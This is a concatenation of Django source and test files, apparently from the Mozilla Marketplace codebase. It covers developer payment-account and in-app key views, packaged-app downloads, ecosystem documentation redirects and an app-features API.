log = commonware.log.getLogger('z.devhub')
@dev_required
@post_required
def disable_payments(request, addon_id, addon):
addon.update(wants_contributions=False)
return redirect(addon.get_dev_url('payments'))
@dev_required(owner_for_post=True, webapp=True)
def payments(request, addon_id, addon, webapp=False):
premium_form = forms_payments.PremiumForm(
request.POST or None, request=request, addon=addon,
user=request.amo_user)
region_form = forms.RegionForm(
request.POST or None, product=addon, request=request)
upsell_form = forms_payments.UpsellForm(
request.POST or None, addon=addon, user=request.amo_user)
providers = get_providers()
if 'form-TOTAL_FORMS' in request.POST:
formset_data = request.POST
else:
formset_data = None
account_list_formset = forms_payments.AccountListFormSet(
data=formset_data,
provider_data=[
{'addon': addon, 'user': request.amo_user, 'provider': provider}
for provider in providers])
if request.method == 'POST':
active_forms = [premium_form, region_form, upsell_form]
if formset_data is not None:
active_forms.append(account_list_formset)
success = all(form.is_valid() for form in active_forms)
if success:
region_form.save()
try:
premium_form.save()
except client.Error as err:
success = False
log.error('Error setting payment information (%s)' % err)
messages.error(
request, _(u'We encountered a problem connecting to the '
u'payment server.'))
raise # We want to see these exceptions!
is_free_inapp = addon.premium_type == amo.ADDON_FREE_INAPP
is_now_paid = (addon.premium_type in amo.ADDON_PREMIUMS
or is_free_inapp)
# If we haven't changed to a free app, check the upsell.
if is_now_paid and success:
try:
if not is_free_inapp:
upsell_form.save()
if formset_data is not None:
account_list_formset.save()
except client.Error as err:
log.error('Error saving payment information (%s)' % err)
messages.error(
request, _(u'We encountered a problem connecting to '
u'the payment server.'))
success = False
raise # We want to see all the solitude errors now.
# If everything happened successfully, give the user a pat on the back.
if success:
messages.success(request, _('Changes successfully saved.'))
return redirect(addon.get_dev_url('payments'))
# TODO: refactor this (bug 945267)
is_packaged = addon.is_packaged
android_payments_enabled = waffle.flag_is_active(request,
'android-payments')
android_packaged_enabled = waffle.flag_is_active(request,
'android-packaged')
desktop_packaged_enabled = waffle.flag_is_active(request,
'desktop-packaged')
# If android payments is not allowed then firefox os must
# be 'checked' and android-mobile and android-tablet should not be.
invalid_paid_platform_state = []
# If isn't packaged or it is packaged and the android-packaged flag is on
# then we should check that desktop isn't set to True.
if not is_packaged or (is_packaged and desktop_packaged_enabled):
invalid_paid_platform_state.append(('desktop', True))
if not android_payments_enabled:
# When android-payments is off...
# If isn't packaged or it is packaged and the android-packaged flag is
# on then we should check for the state of android-mobile and
# android-tablet.
if not is_packaged or (is_packaged and android_packaged_enabled):
invalid_paid_platform_state += [('android-mobile', True),
('android-tablet', True)]
invalid_paid_platform_state.append(('firefoxos', False))
cannot_be_paid = (
addon.premium_type == amo.ADDON_FREE and
any(premium_form.device_data['free-%s' % x] == y
for x, y in invalid_paid_platform_state))
try:
tier_zero = Price.objects.get(price='0.00', active=True)
tier_zero_id = tier_zero.pk
except Price.DoesNotExist:
tier_zero = None
tier_zero_id = ''
# Get the regions based on tier zero. This should be all the
# regions with payments enabled.
paid_region_ids_by_name = []
if tier_zero:
paid_region_ids_by_name = tier_zero.region_ids_by_name()
platforms = PAID_PLATFORMS(request, is_packaged)
paid_platform_names = [unicode(platform[1]) for platform in platforms]
provider_regions = {}
if tier_zero:
provider_regions = tier_zero.provider_regions()
return render(request, 'developers/payments/premium.html',
{'addon': addon, 'webapp': webapp, 'premium': addon.premium,
'form': premium_form, 'upsell_form': upsell_form,
'tier_zero_id': tier_zero_id, 'region_form': region_form,
'DEVICE_LOOKUP': DEVICE_LOOKUP,
'is_paid': (addon.premium_type in amo.ADDON_PREMIUMS
or addon.premium_type == amo.ADDON_FREE_INAPP),
'cannot_be_paid': cannot_be_paid,
'paid_platform_names': paid_platform_names,
'is_packaged': addon.is_packaged,
# Bango values
'account_list_forms': account_list_formset.forms,
'account_list_formset': account_list_formset,
# Waffles
'api_pricelist_url': reverse('price-list'),
'payment_methods': {
PAYMENT_METHOD_ALL: _('All'),
PAYMENT_METHOD_CARD: _('Credit card'),
PAYMENT_METHOD_OPERATOR: _('Carrier'),
},
'provider_lookup': dict(PROVIDER_CHOICES),
'all_paid_region_ids_by_name': paid_region_ids_by_name,
'providers': providers,
'provider_regions': provider_regions,
})
@login_required
@json_view
def payment_accounts(request):
app_slug = request.GET.get('app-slug', '')
if app_slug:
app = Webapp.objects.get(app_slug=app_slug)
app_name = app.name
else:
app_name = ''
accounts = PaymentAccount.objects.filter(
user=request.amo_user,
provider__in=[p.provider for p in get_providers()],
inactive=False)
def account(acc):
def payment_account_names(app):
account_names = [unicode(acc.payment_account)
for acc in app.all_payment_accounts()]
return (unicode(app.name), account_names)
addon_payment_accounts = acc.addonpaymentaccount_set.all()
associated_apps = [apa.addon
for apa in addon_payment_accounts
if hasattr(apa, 'addon')]
app_names = u', '.join(unicode(app.name) for app in associated_apps)
app_payment_accounts = json.dumps(dict([payment_account_names(app)
for app in associated_apps]))
provider = acc.get_provider()
data = {
'account-url': reverse('mkt.developers.provider.payment_account',
args=[acc.pk]),
'agreement-url': acc.get_agreement_url(),
'agreement': 'accepted' if acc.agreed_tos else 'rejected',
'current-app-name': jinja2.escape(app_name),
'app-names': jinja2.escape(app_names),
'app-payment-accounts': jinja2.escape(app_payment_accounts),
'delete-url': reverse(
'mkt.developers.provider.delete_payment_account',
args=[acc.pk]),
'id': acc.pk,
'name': jinja2.escape(unicode(acc)),
'provider': provider.name,
'provider-full': unicode(provider.full),
'shared': acc.shared,
'portal-url': provider.get_portal_url(app_slug)
}
return data
return map(account, accounts)
@login_required
def payment_accounts_form(request):
webapp = get_object_or_404(Webapp, app_slug=request.GET.get('app_slug'))
provider = get_provider(name=request.GET.get('provider'))
account_list_formset = forms_payments.AccountListFormSet(
provider_data=[
{'user': request.amo_user, 'addon': webapp, 'provider': p}
for p in get_providers()])
account_list_form = next(form for form in account_list_formset.forms
if form.provider.name == provider.name)
return render(request,
'developers/payments/includes/bango_accounts_form.html',
{'account_list_form': account_list_form})
@write
@post_required
@login_required
@json_view
def payments_accounts_add(request):
provider = get_provider(name=request.POST.get('provider'))
form = provider.forms['account'](request.POST)
if not form.is_valid():
return json_view.error(form.errors)
try:
obj = provider.account_create(request.amo_user, form.cleaned_data)
except HttpClientError as e:
log.error('Client error create {0} account: {1}'.format(
provider.name, e))
return http.HttpResponseBadRequest(json.dumps(e.content))
return {'pk': obj.pk, 'agreement-url': obj.get_agreement_url()}
@write
@login_required
@json_view
def payments_account(request, id):
account = get_object_or_404(PaymentAccount, pk=id, user=request.user)
provider = account.get_provider()
if request.POST:
form = provider.forms['account'](request.POST, account=account)
if form.is_valid():
form.save()
else:
return json_view.error(form.errors)
return provider.account_retrieve(account)
@write
@post_required
@login_required
def payments_accounts_delete(request, id):
account = get_object_or_404(PaymentAccount, pk=id, user=request.user)
try:
account.cancel(disable_refs=True)
except CantCancel:
log.info('Could not cancel account.')
return http.HttpResponse('Cannot cancel account', status=409)
log.info('Account cancelled: %s' % id)
return http.HttpResponse('success')
@login_required
def in_app_keys(request):
"""
Allows developers to get a simulation-only key for in-app payments.
This key cannot be used for real payments.
"""
keys = UserInappKey.objects.no_cache().filter(
solitude_seller__user=request.amo_user
)
# TODO(Kumar) support multiple test keys. For now there's only one.
key = None
key_public_id = None
if keys.exists():
key = keys.get()
# Attempt to retrieve the public id from solitude
try:
key_public_id = key.public_id()
except HttpClientError, e:
messages.error(request,
_('A server error occurred '
'when retrieving the application key.'))
log.exception('Solitude connection error: {0}'.format(e.message))
if request.method == 'POST':
if key:
key.reset()
messages.success(request, _('Secret was reset successfully.'))
else:
UserInappKey.create(request.amo_user)
messages.success(request,
_('Key and secret were created successfully.'))
return redirect(reverse('mkt.developers.apps.in_app_keys'))
return render(request, 'developers/payments/in-app-keys.html',
{'key': key, 'key_public_id': key_public_id})
@login_required
def in_app_key_secret(request, pk):
key = (UserInappKey.objects.no_cache()
.filter(solitude_seller__user=request.amo_user, pk=pk))
if not key.count():
# Either the record does not exist or it's not owned by the
# logged in user.
return http.HttpResponseForbidden()
return http.HttpResponse(key.get().secret())
def require_in_app_payments(render_view):
@functools.wraps(render_view)
def inner(request, addon_id, addon, *args, **kwargs):
setup_url = reverse('mkt.developers.apps.payments',
args=[addon.app_slug])
if addon.premium_type not in amo.ADDON_INAPPS:
messages.error(
request,
_('Your app is not configured for in-app payments.'))
return redirect(setup_url)
if not addon.has_payment_account():
messages.error(request, _('No payment account for this app.'))
return redirect(setup_url)
# App is set up for payments; render the view.
return render_view(request, addon_id, addon, *args, **kwargs)
return inner
@waffle_switch('in-app-products')
@login_required
@dev_required(webapp=True)
@require_in_app_payments
def in_app_products(request, addon_id, addon, webapp=True, account=None):
owner = acl.check_addon_ownership(request, addon)
products = addon.inappproduct_set.all()
new_product = InAppProduct(webapp=addon)
form = InAppProductForm()
return render(request, 'developers/payments/in-app-products.html',
{'addon': addon, 'form': form, 'new_product': new_product,
'owner': owner, 'products': products, 'form': form})
@login_required
@dev_required(owner_for_post=True, webapp=True)
@require_in_app_payments
def in_app_config(request, addon_id, addon, webapp=True):
"""
Allows developers to get a key/secret for doing in-app payments.
"""
config = get_inapp_config(addon)
owner = acl.check_addon_ownership(request, addon)
if request.method == 'POST':
# Reset the in-app secret for the app.
(client.api.generic
.product(config['resource_pk'])
.patch(data={'secret': generate_key(48)}))
messages.success(request, _('Changes successfully saved.'))
return redirect(reverse('mkt.developers.apps.in_app_config',
args=[addon.app_slug]))
return render(request, 'developers/payments/in-app-config.html',
{'addon': addon, 'owner': owner,
'seller_config': config})
@login_required
@dev_required(webapp=True)
@require_in_app_payments
def in_app_secret(request, addon_id, addon, webapp=True):
config = get_inapp_config(addon)
return http.HttpResponse(config['secret'])
def get_inapp_config(addon):
"""
Returns a generic Solitude product, the app's in-app configuration.
We use generic products in Solitude to represent an "app" that is
enabled for in-app purchases.
"""
if not addon.solitude_public_id:
# If the view accessing this method uses all the right
# decorators then this error won't be raised.
raise ValueError('The app {a} has not yet been configured '
'for payments'.format(a=addon))
return client.api.generic.product.get_object(
public_id=addon.solitude_public_id)
@dev_required(webapp=True)
def bango_portal_from_addon(request, addon_id, addon, webapp=True):
try:
bango = addon.payment_account(PROVIDER_BANGO)
except addon.PayAccountDoesNotExist:
log.error('Bango portal not available for app {app} '
'with accounts {acct}'
.format(app=addon,
acct=list(addon.all_payment_accounts())))
return http.HttpResponseForbidden()
else:
account = bango.payment_account
if not ((addon.authors.filter(pk=request.user.pk,
addonuser__role=amo.AUTHOR_ROLE_OWNER).exists()) and
(account.solitude_seller.user.id == request.user.id)):
log.error(('User not allowed to reach the Bango portal; '
'pk=%s') % request.user.pk)
return http.HttpResponseForbidden()
return _redirect_to_bango_portal(account.account_id,
'addon_id: %s' % addon_id)
def _redirect_to_bango_portal(package_id, source):
try:
bango_token = client.api.bango.login.post({'packageId':
int(package_id)})
except HttpClientError as e:
log.error('Failed to authenticate against Bango portal; %s' % source,
exc_info=True)
return http.HttpResponseBadRequest(json.dumps(e.content))
bango_url = '{base_url}{parameters}'.format(**{
'base_url': settings.BANGO_BASE_PORTAL_URL,
'parameters': urllib.urlencode({
'authenticationToken': bango_token['authentication_token'],
'emailAddress': bango_token['email_address'],
'packageId': package_id,
'personId': bango_token['person_id'],
})
})
response = http.HttpResponse(status=204)
response['Location'] = bango_url
return response
# TODO(andym): move these into a DRF API.
@login_required
@json_view
def agreement(request, id):
account = get_object_or_404(PaymentAccount, pk=id, user=request.user)
provider = account.get_provider()
if request.method == 'POST':
return provider.terms_update(account)
return provider.terms_retrieve(account)
########NEW FILE########
__FILENAME__ = test_views
from django.conf import settings
from django.core.urlresolvers import reverse
import mock
from nose import SkipTest
from nose.tools import eq_
import amo
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BasePackagedAppTest
class TestDownload(BasePackagedAppTest):
fixtures = ['base/apps', 'base/users', 'base/platforms'
] + fixture('webapp_337141')
def setUp(self):
super(TestDownload, self).setUp()
super(TestDownload, self).setup_files()
self.url = reverse('downloads.file', args=[self.file.pk])
@mock.patch.object(packaged, 'sign', mock_sign)
def test_download(self):
if not settings.XSENDFILE:
raise SkipTest
res = self.client.get(self.url)
eq_(res.status_code, 200)
assert settings.XSENDFILE_HEADER in res
def test_disabled(self):
self.app.update(status=amo.STATUS_DISABLED)
eq_(self.client.get(self.url).status_code, 404)
def test_not_public(self):
self.file.update(status=amo.STATUS_PENDING)
eq_(self.client.get(self.url).status_code, 404)
@mock.patch('lib.crypto.packaged.sign')
def test_not_public_but_owner(self, sign):
self.client.login(username='[email protected]',
password='password')
self.file.update(status=amo.STATUS_PENDING)
eq_(self.client.get(self.url).status_code, 200)
assert not sign.called
@mock.patch('lib.crypto.packaged.sign')
def test_not_public_not_owner(self, sign):
self.client.login(username='[email protected]',
password='password')
self.file.update(status=amo.STATUS_PENDING)
eq_(self.client.get(self.url).status_code, 404)
@mock.patch.object(packaged, 'sign', mock_sign)
def test_disabled_but_owner(self):
self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(self.url).status_code, 200)
@mock.patch.object(packaged, 'sign', mock_sign)
def test_disabled_but_admin(self):
self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(self.url).status_code, 200)
def test_not_webapp(self):
self.app.update(type=amo.ADDON_EXTENSION)
eq_(self.client.get(self.url).status_code, 404)
@mock.patch.object(packaged, 'sign', mock_sign)
def test_file_blocklisted(self):
if not settings.XSENDFILE:
raise SkipTest
self.file.update(status=amo.STATUS_BLOCKED)
res = self.client.get(self.url)
eq_(res.status_code, 200)
assert settings.XSENDFILE_HEADER in res
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.downloads import views
urlpatterns = patterns('',
# .* at the end to match filenames.
# /file/:id/type:attachment
url('^file/(?P<file_id>\d+)(?:/type:(?P<type>\w+))?(?:/.*)?',
views.download_file, name='downloads.file'),
)
########NEW FILE########
__FILENAME__ = views
from django import http
from django.shortcuts import get_object_or_404
import commonware.log
import amo
from access import acl
from amo.utils import HttpResponseSendFile
from files.models import File
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.downloads')
def download_file(request, file_id, type=None):
file = get_object_or_404(File, pk=file_id)
webapp = get_object_or_404(Webapp, pk=file.version.addon_id,
is_packaged=True)
if webapp.is_disabled or file.status == amo.STATUS_DISABLED:
if not acl.check_addon_ownership(request, webapp, viewer=True,
ignore_disabled=True):
raise http.Http404()
# We treat blocked files like public files so users get the update.
if file.status in [amo.STATUS_PUBLIC, amo.STATUS_BLOCKED]:
path = webapp.sign_if_packaged(file.version_id)
else:
# This is someone asking for an unsigned packaged app.
if not acl.check_addon_ownership(request, webapp, dev=True):
raise http.Http404()
path = file.file_path
log.info('Downloading package: %s from %s' % (webapp.id, path))
return HttpResponseSendFile(request, path, content_type='application/zip',
etag=file.hash.split(':')[-1])
########NEW FILE########
__FILENAME__ = models
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse
import basket
import mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
VIEW_PAGES = (
'design_ui', 'dev_phone', 'partners', 'publish_deploy', 'support'
)
REDIRECT_PAGES = (
'build_apps_offline', 'build_ffos', 'build_game_apps', 'build_intro',
'build_manifests', 'build_mobile_developers', 'build_quick',
'build_reference', 'build_web_developers', 'design_concept',
'design_fundamentals', 'design_patterns', 'ffos_guideline',
'publish_hosted', 'publish_packaged', 'publish_review', 'publish_submit',
'responsive_design', 'firefox_os_simulator', 'build_payments',
'publish_payments', 'build_app_generator', 'build_dev_tools', 'build_tools',
'app_manager'
)
class TestLanding(amo.tests.TestCase):
def setUp(self):
self.url = reverse('ecosystem.landing')
def test_legacy_redirect(self):
r = self.client.get('/ecosystem/')
self.assert3xx(r, '/developers/', 301)
def test_tutorials_default(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
self.assertTemplateUsed(r, 'ecosystem/landing.html')
@mock.patch('basket.subscribe')
def test_newsletter_form_valid(self, subscribe_mock):
d = {'email': '[email protected]', 'email_format': 'T', 'privacy': True,
'country': 'us'}
r = self.client.post(self.url, d)
self.assert3xx(r, reverse('ecosystem.landing'))
assert subscribe_mock.called
@mock.patch('basket.subscribe')
def test_newsletter_form_invalid(self, subscribe_mock):
d = {'email': '', 'email_format': 'T', 'privacy': True,
'country': 'us'}
r = self.client.post(self.url, d)
eq_(r.status_code, 200)
self.assertFormError(r, 'newsletter_form', 'email',
[u'Please enter a valid email address.'])
assert not subscribe_mock.called
@mock.patch('basket.subscribe')
def test_newsletter_form_exception(self, subscribe_mock):
subscribe_mock.side_effect = basket.BasketException
d = {'email': '[email protected]', 'email_format': 'T', 'privacy': True,
'country': 'us'}
r = self.client.post(self.url, d)
eq_(r.status_code, 200)
eq_(pq(r.content)('.notification-box.error h2').text(),
'We apologize, but an error occurred in our '
'system. Please try again later.')
assert subscribe_mock.called
class TestDevHub(amo.tests.TestCase):
def test_content_pages(self):
for page in VIEW_PAGES:
r = self.client.get(reverse('ecosystem.%s' % page))
eq_(r.status_code, 200, '%s: status %s' % (page, r.status_code))
self.assertTemplateUsed(r, 'ecosystem/%s.html' % page)
def test_redirect_pages(self):
for page in REDIRECT_PAGES:
r = self.client.get(reverse('ecosystem.%s' % page))
eq_(r.status_code, 301, '%s: status %s' % (page, r.status_code))
def test_valid_reference_app(self):
r = self.client.get(reverse('ecosystem.apps_documentation',
args=['face_value']))
eq_(r.status_code, 200)
self.assertTemplateUsed(r, 'ecosystem/reference_apps/face_value.html')
def test_invalid_reference_app(self):
r = self.client.get(reverse('ecosystem.apps_documentation',
args=['face_value_invalid']))
eq_(r.status_code, 404)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from django.views.generic import RedirectView
from . import views
def redirect_doc(uri):
return RedirectView.as_view(
url='https://developer.mozilla.org/docs%s' % uri)
redirect_patterns = patterns('',
url('^docs/firefox_os_guideline$',
redirect_doc('/Web/Apps/Design'),
name='ecosystem.ffos_guideline'),
url('^docs/responsive_design$',
redirect_doc('/Web_Development/Mobile/Responsive_design'),
name='ecosystem.responsive_design'),
url('^docs/patterns$',
redirect_doc('/Web/Apps/Design/Responsive_Navigation_Patterns'),
name='ecosystem.design_patterns'),
url('^docs/review$',
redirect_doc('/Web/Apps/Publishing/Marketplace_review_criteria'),
name='ecosystem.publish_review'),
url('^docs/hosted$',
redirect_doc('/Mozilla/Marketplace/Publish_options#Hosted_apps'),
name='ecosystem.publish_hosted'),
url('^docs/submission$',
redirect_doc('/Web/Apps/Publishing/Submitting_an_app'),
name='ecosystem.publish_submit'),
url('^docs/packaged$',
redirect_doc('/Web/Apps/Developing/Packaged_apps'),
name='ecosystem.publish_packaged'),
url('^docs/intro_apps$',
redirect_doc('/Web/Apps/Quickstart/Build/Intro_to_open_web_apps'),
name='ecosystem.build_intro'),
url('^docs/firefox_os$',
redirect_doc('/Mozilla/Firefox_OS'),
name='ecosystem.build_ffos'),
url('^docs/manifests$',
redirect_doc('/Web/Apps/FAQs/About_app_manifests'),
name='ecosystem.build_manifests'),
url('^docs/apps_offline$',
redirect_doc('/Web/Apps/Offline_apps'),
name='ecosystem.build_apps_offline'),
url('^docs/game_apps$',
redirect_doc('/Web/Apps/Developing/Games'),
name='ecosystem.build_game_apps'),
url('^docs/mobile_developers$',
redirect_doc('/Web/Apps/Quickstart/Build/For_mobile_developers'),
name='ecosystem.build_mobile_developers'),
url('^docs/web_developers$',
redirect_doc('/Web/Apps/Quickstart/Build/For_Web_developers'),
name='ecosystem.build_web_developers'),
url('^docs/firefox_os_simulator$',
redirect_doc('/Tools/Firefox_OS_Simulator'),
name='ecosystem.firefox_os_simulator'),
url('^docs/payments$',
redirect_doc('/Web/Apps/Quickstart/Build/Payments'),
name='ecosystem.build_payments'),
url('^docs/concept$',
redirect_doc('/Web/Apps/Quickstart/Design/Concept_A_great_app'),
name='ecosystem.design_concept'),
url('^docs/fundamentals$',
redirect_doc('/Web/Apps/Quickstart/Design/Design_Principles'),
name='ecosystem.design_fundamentals'),
url('^docs/quick_start$',
redirect_doc('/Web/Apps/Quickstart/Build/Your_first_app'),
name='ecosystem.build_quick'),
url('^docs/reference_apps$',
redirect_doc('/Web/Apps/Reference_apps'),
name='ecosystem.build_reference'),
url('^docs/payments/status$',
redirect_doc('/Mozilla/Marketplace/Payments_Status'),
name='ecosystem.publish_payments'),
url('^docs/tools$',
redirect_doc('/Web/Apps/Quickstart/Build/App_tools'),
name='ecosystem.build_tools'),
url('^docs/app_generator$',
redirect_doc('/Web/Apps/Developing/App_templates'),
name='ecosystem.build_app_generator'),
url('^docs/app_manager$',
redirect_doc('/Mozilla/Firefox_OS/Using_the_App_Manager'),
name='ecosystem.app_manager'),
url('^docs/dev_tools$',
redirect_doc('/Tools'),
name='ecosystem.build_dev_tools'),
)
urlpatterns = redirect_patterns + patterns('',
url('^$', views.landing, name='ecosystem.landing'),
url('^partners$', views.partners, name='ecosystem.partners'),
url('^support$', views.support, name='ecosystem.support'),
url('^dev_phone$', views.dev_phone, name='ecosystem.dev_phone'),
url('^docs/ui_guidelines$', views.design_ui,
name='ecosystem.design_ui'),
url('^docs/deploy$', views.publish_deploy,
name='ecosystem.publish_deploy'),
url('^docs/badges$', views.publish_badges,
name='ecosystem.publish_badges'),
url('^docs/apps/(?P<page>\w+)?$', views.apps_documentation,
name='ecosystem.apps_documentation'),
)
########NEW FILE########
__FILENAME__ = views
# -*- coding: utf-8 -*-
from django.conf import settings
from django.http import Http404
from django.shortcuts import redirect, render
import basket
import commonware.log
from session_csrf import anonymous_csrf
from tower import ugettext as _
from amo import messages
from mkt.developers.forms import DevNewsletterForm
log = commonware.log.getLogger('z.ecosystem')
@anonymous_csrf
def landing(request):
"""Developer Hub landing page."""
videos = [
{
'name': 'airbnb',
'path': 'FirefoxMarketplace-airbnb-BR-RC-SD1%20640'
},
{
'name': 'evernote',
'path': 'FirefoxMarketplace-Evernote_BR-RC-SD1%20640'
},
{
'name': 'uken',
'path': 'FirefoxMarketplace-uken-BR-RC-SD1%20640'
},
{
'name': 'soundcloud',
'path': 'FirefoxMarketplace-Soundcloud-BR-RC-SD1%20640'
},
{
'name': 'box',
'path': 'FirefoxMarketplace_box-BR-RC-SD1%20640'
}
]
form = DevNewsletterForm(request.LANG, request.POST or None)
if request.method == 'POST' and form.is_valid():
data = form.cleaned_data
try:
basket.subscribe(data['email'],
'app-dev',
format=data['email_format'],
source_url=settings.SITE_URL)
messages.success(request, _('Thank you for subscribing!'))
return redirect('ecosystem.landing')
except basket.BasketException as e:
log.error(
'Basket exception in ecosystem newsletter: %s' % e)
messages.error(
request, _('We apologize, but an error occurred in our '
'system. Please try again later.'))
return render(request, 'ecosystem/landing.html',
{'videos': videos, 'newsletter_form': form})
def support(request):
"""Landing page for support."""
return render(request, 'ecosystem/support.html',
{'page': 'support', 'category': 'build'})
def partners(request):
"""Landing page for partners."""
return render(request, 'ecosystem/partners.html', {'page': 'partners'})
def installation(request):
"""Landing page for installation."""
return render(request, 'ecosystem/installation.html',
{'page': 'installation', 'category': 'publish'})
def dev_phone(request):
"""Landing page for the developer phone."""
return render(request, 'ecosystem/dev_phone.html',
{'page': 'dev_phone'})
def design_ui(request):
"""Design - UI Guidelines page."""
return render(request, 'ecosystem/design_ui.html',
{'page': 'design_ui', 'category': 'design'})
def publish_deploy(request):
"""Publish - Deploying your app page."""
return render(request, 'ecosystem/publish_deploy.html',
{'page': 'publish_deploy', 'category': 'publish'})
def publish_badges(request):
"""Publish - Marketplace badges."""
return render(request, 'ecosystem/publish_badges.html',
{'page': 'badges', 'category': 'publish'})
def apps_documentation(request, page=None):
"""Page template for all reference apps."""
if page not in ('chrono', 'face_value', 'podcasts', 'roller',
'webfighter', 'generalnotes', 'rtcamera'):
raise Http404
third_party_libs = {
'node': {
'link': 'http://nodejs.org/',
'title': 'Node.js',
},
'zepto': {
'link': 'http://zeptojs.com/',
'title': 'zepto.js',
},
'backbone': {
'link': 'http://backbonejs.org/',
'title': 'backbone.js',
},
'redis': {
'link': 'http://redis.io',
'title': 'redis',
},
'volo': {
'link': 'http://volojs.org/',
'title': 'volo.js',
},
'jquery': {
'link': 'http://jquery.com/',
'title': 'jQuery',
},
'requirejs': {
'link': 'http://requirejs.org/',
'title': 'RequireJS',
},
'animated_gif': {
'link': 'https://github.com/sole/Animated_GIF',
'title': 'Animated GIF',
},
'async_storage': {
'link': 'https://github.com/mozilla-b2g/gaia/blob/master/shared/js/async_storage.js',
'title': 'Async Storage',
},
'glmatrix': {
'link': 'http://glmatrix.net',
'title': 'glMatrix',
},
'hammerjs': {
'link': 'http://eightmedia.github.io/hammer.js',
'title': 'hammer.js',
}
}
web_api_libs = {
'localstorage': {
'link': '//developer.mozilla.org/docs/DOM/Storage#localStorage',
'title': 'localStorage',
},
'appcache': {
'link': '//developer.mozilla.org/docs/HTML/Using_the_application_cache',
'title': 'appcache',
},
'open_web_apps': {
'link': '//developer.mozilla.org/docs/Apps/Apps_JavaScript_API',
'title': 'Open Web Apps',
},
'indexed_db': {
'link': '//developer.mozilla.org/docs/IndexedDB',
'title': 'IndexedDB',
},
'systemxhr': {
'link': '//developer.mozilla.org/docs/DOM/XMLHttpRequest#Non-standard_properties',
'title': 'systemXHR',
},
'canvas': {
'link': '//developer.mozilla.org/docs/HTML/Canvas',
'title': 'Canvas',
},
'fullscreen': {
'link': '//developer.mozilla.org/docs/DOM/Using_fullscreen_mode',
'title': 'Fullscreen'
},
'in_app_payments': {
'link': '//developer.mozilla.org/docs/Web/Apps/Publishing/In-app_payments',
'title': 'In-app Payments',
},
'blob': {
'link': '//developer.mozilla.org/docs/Web/API/Blob',
'title': 'Blob',
},
'url': {
'link': '//developer.mozilla.org/docs/Web/API/window.URL',
'title': 'URL',
},
'webgl': {
'link': '//developer.mozilla.org/docs/Web/WebGL',
'title': 'WebGL',
},
'webrtc': {
'link': '//developer.mozilla.org/docs/WebRTC',
'title': 'WebRTC',
},
'getusermedia': {
'link': '//developer.mozilla.org/docs/Web/API/Navigator.getUserMedia',
'title': 'getUserMedia',
},
'webworkers': {
'link': '//developer.mozilla.org/docs/Web/API/Worker',
'title': 'Web Workers',
},
'xmlhttprequest': {
'link': '//developer.mozilla.org/docs/Web/API/XMLHttpRequest',
'title': 'XMLHttpRequest',
}
}
custom_elements_libs = {
'gaia': {
'link': 'https://wiki.mozilla.org/Gaia/Design/BuildingBlocks',
'title': _('Gaia Building Blocks'),
},
'xtags': {
'link': 'http://x-tags.org',
'title': 'x-tags',
}
}
ctx = {
'page': page,
'category': 'build',
'third_party_libs': third_party_libs,
'web_api_libs': web_api_libs,
'custom_elements_libs': custom_elements_libs
}
return render(request, ('ecosystem/reference_apps/%s.html' % page), ctx)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from mkt.webapps.models import AppFeatures
class AppFeaturesSerializer(serializers.ModelSerializer):
class Meta:
model = AppFeatures
fields = []
depth = 0
def to_native(self, obj):
return [f.replace('has_', '') for f in obj._fields() if getattr(obj, f)
and f.startswith('has_')]
########NEW FILE########
__FILENAME__ = test_serializers
import amo.tests
from mkt.features.serializers import AppFeaturesSerializer
class TestAppFeaturesSerializer(amo.tests.TestCase):
def setUp(self):
self.app = amo.tests.app_factory()
self.serializer = AppFeaturesSerializer()
def _test_features(self, true_features):
features = self.app.current_version.features
data = self.serializer.to_native(features)
self.assertSetEqual(['has_' + i for i in data], true_features)
def test_all_false(self):
self._test_features([])
def test_one_true(self):
features = {'has_apps': True}
self.app.current_version.features.update(**features)
self._test_features(features.keys())
def test_several_true(self):
features = {'has_apps': True, 'has_video_webm': True}
self.app.current_version.features.update(**features)
self._test_features(features.keys())
########NEW FILE########
__FILENAME__ = test_views
import json
from nose.tools import eq_
from django.core.urlresolvers import reverse
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants.features import APP_FEATURES, FeatureProfile
class TestConfig(RestOAuth):
def setUp(self):
super(TestConfig, self).setUp()
self.url = reverse('api-features-feature-list')
def _test_response(self, res):
eq_(res.status_code, 200)
data = res.json
eq_(len(data), len(APP_FEATURES))
self.assertSetEqual(data.keys(),
[f.lower() for f in APP_FEATURES.keys()])
for i, feature in enumerate(APP_FEATURES.items()):
name = feature[0].lower()
eq_(i + 1, data[name]['position'])
def test_with_profile(self):
profile = FeatureProfile(apps=True).to_signature()
res = self.anon.get(self.url, {'pro': profile})
self._test_response(res)
eq_(res.json['apps']['present'], True)
eq_(res.json['audio']['present'], False)
def test_anon(self):
res = self.anon.get(self.url)
self._test_response(res)
def test_authenticated(self):
res = self.client.get(self.url)
self._test_response(res)
def test_post(self):
res = self.client.post(self.url)
eq_(res.status_code, 405)
########NEW FILE########
__FILENAME__ = utils
from mkt.constants.features import FeatureProfile
def get_feature_profile(request):
profile = None
if request.GET.get('dev') in ('firefoxos', 'android'):
sig = request.GET.get('pro')
if sig:
try:
profile = FeatureProfile.from_signature(sig)
except ValueError:
pass
return profile
########NEW FILE########
__FILENAME__ = views
from ordereddict import OrderedDict
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from mkt.api.base import CORSMixin
from mkt.constants.features import APP_FEATURES, FeatureProfile
class AppFeaturesList(CORSMixin, APIView):
authentication_classes = permission_classes = []
cors_allowed_methods = ['get']
def _feature(self, i, slug):
feature = APP_FEATURES[slug.upper()]
data = {
'name': feature['name'],
'description': feature['description'],
'position': i + 1,
}
if self.profile:
data['present'] = self.profile.get(slug.lower(), False)
return (slug.lower(), data)
def get(self, request, *args, **kwargs):
if 'pro' in request.GET:
self.profile = FeatureProfile.from_signature(request.GET['pro'])
else:
self.profile = None
features = OrderedDict(self._feature(i, slug) for i, slug in
enumerate(APP_FEATURES.keys()))
return Response(features, status=status.HTTP_200_OK)
